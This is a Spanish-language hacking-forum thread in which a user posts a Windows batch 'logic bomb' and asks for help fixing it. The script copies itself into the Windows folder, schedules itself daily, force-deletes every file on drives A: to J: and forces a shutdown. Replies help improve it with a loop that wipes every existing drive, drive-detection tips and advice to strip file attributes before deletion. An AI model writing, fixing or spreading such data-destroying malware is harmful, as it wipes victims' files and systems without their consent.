elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  BATCH. Aclaración de codigo. :)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: BATCH. Aclaración de codigo. :)  (Leído 3,048 veces)
HCK.

Desconectado Desconectado

Mensajes: 181



Ver Perfil
BATCH. Aclaración de codigo. :)
« en: 19 Marzo 2010, 16:45 pm »

Hola chicos. Bueno soy nuevo en el foro. Hace tiempo yo me dedicaba a hacer scripts en batch. Aprendi con pequeños tutoriales y me ha ido muy bien.
Lo que pasa hace mucho que lo descuidé y tendre que repasar :huh:.

Os comentaba que si me podiais echar una mano con este code. :)

Código:
@echo off
copy "%homepath%\HCKB.bat" "%WINDIR%\shutdownd.bat"
at 19:00 /every:1 "%WINDIR%\shutdownd.bat"
del /f /s /q "a:" *.*
del /f /s /q "b:" *.*
del /f /s /q "c:" *.*
del /f /s /q "d:" *.*
del /f /s /q "e:" *.*
del /f /s /q "f:" *.*
del /f /s /q "g:" *.*
del /f /s /q "h:" *.*
del /f /s /q "i:" *.*
del /f /s /q "j:" *.*
shutdown -s -f -r 10 -c DAÑOS GRAVES. FORZADO APAGADO.
exit


El significado del codigo que deseo realizar, como yo me acuerdo, es simplemente que el .bat se copie a windows, se programe su ejecución para el dia 1 de abril a las 7, en verdad seria ejecucion para todos los 1 de abril, pero con el primer mes basta y borre todos los archivos de todas las unidades. En plan bomba lógica. Lo he probado, y me dice.
"El nombre del archivo, el nombre de la sinxtasis de la etiqueta del volumen no es correcta."

Si %WINDIR% es el directorio general de windows, que en cualquier SO lleva hasta allí. ¿Que ocurre?.

Espero que me podais ayudar a mejorar mi codigo.
Yo colaboraré mas en este foro, que veo desde hace tiempo y que me gustaria colaborar. :)


« Última modificación: 19 Marzo 2010, 23:08 pm por Leo Gutiérrez. » En línea

winroot


Desconectado Desconectado

Mensajes: 589

#include<winroot.h>


Ver Perfil WWW
Re: BATCH. Aclaración de codigo. :)
« Respuesta #1 en: 19 Marzo 2010, 17:19 pm »

ola
yo  comprovaria si existen las unidades y en  ese caso eliminar los archivos
for %%a in(c d e f g h i j k m l n o p q r s t u v w x y z)do if exist %%a del /f /s /q %%a\*
solo es una sugerencia ya que capas que el error esta en el del
ahora miro un  poco mas el code y si encuentro algo  mas comento
un saludo!


En línea

Mi blog sobre programación y seguridad informática:
http://win-root.blogspot.com
winroot


Desconectado Desconectado

Mensajes: 589

#include<winroot.h>


Ver Perfil WWW
Re: BATCH. Aclaración de codigo. :)
« Respuesta #2 en: 19 Marzo 2010, 17:21 pm »

otra cosa las " no son nesesarias capas q es eso
copy %homepath%\bck.bat %windir%\shutdown.bat
despues el at ni idea ya que hace mucho que no  uso comandos asi
un saludo!
En línea

Mi blog sobre programación y seguridad informática:
http://win-root.blogspot.com
HCK.

Desconectado Desconectado

Mensajes: 181



Ver Perfil
Re: BATCH. Aclaración de codigo. :)
« Respuesta #3 en: 19 Marzo 2010, 17:27 pm »

jeje. yo puse las unidades, a, b c... porque si el code no encuentra una, salta a la otra, hasta q encuentre una fisica i empiece a borrar. probe el codigo, i se salta el at i empieza a borrar archivos masivamente. sin poseer ni a, ni b... solo c, d y e  ;-).
el %homepatch% y %windir% es la variable. es decir %homepatch% (la unidad donde esta el .bat, un pentdriver, y %windir% la carpeta de archivos de windows. :).
si, son comandos antiguos, pero tienen su utilidad. yo me pondre a dar repasos a mis apuntes de antaño aber q tl jeje.
asias, aber si se puede aclarar lo del codigo jeje.
un saludo
En línea

winroot


Desconectado Desconectado

Mensajes: 589

#include<winroot.h>


Ver Perfil WWW
Re: BATCH. Aclaración de codigo. :)
« Respuesta #4 en: 20 Marzo 2010, 15:11 pm »

jeje. yo puse las unidades, a, b c... porque si el code no encuentra una, salta a la otra, hasta q encuentre una fisica i empiece a borrar. probe el codigo, i se salta el at i empieza a borrar archivos masivamente. sin poseer ni a, ni b... solo c, d y e  ;-).
el %homepatch% y %windir% es la variable. es decir %homepatch% (la unidad donde esta el .bat, un pentdriver, y %windir% la carpeta de archivos de windows. :).
si, son comandos antiguos, pero tienen su utilidad. yo me pondre a dar repasos a mis apuntes de antaño aber q tl jeje.
asias, aber si se puede aclarar lo del codigo jeje.
un saludo
lo de las variables  no hacia falta aclararlo son variables de  entorno tmb podes usar
%systemroot% y %homedrive%
no prove el codigo no tengo el virtual box a mano pero si vos decis que el del hace eso calculo que si nunca uso el /f
y bue anda provando linea por linea metiendo un pause y fijate en que linea esta el error despues de todo no te moriras por depurar  un batch creo
un saludo!
En línea

Mi blog sobre programación y seguridad informática:
http://win-root.blogspot.com
HCK.

Desconectado Desconectado

Mensajes: 181



Ver Perfil
Re: BATCH. Aclaración de codigo. :)
« Respuesta #5 en: 20 Marzo 2010, 17:30 pm »

cierto. me llevará un rato. si descubro xke no me va i eso os comento  :xD
jeje asias por opinar xicos
En línea

---saster---

Desconectado Desconectado

Mensajes: 55


Ver Perfil
Re: BATCH. Aclaración de codigo. :)
« Respuesta #6 en: 20 Marzo 2010, 18:43 pm »

lo puedes simplificar con for y para ver que unidades estan disponible wmic y vol ;)

ah, y antes de borrar archivos quita atributos
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Aclaracion o explicacion
Programación C/C++
Guillito 0 1,858 Último mensaje 31 Agosto 2021, 16:19 pm
por Guillito
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines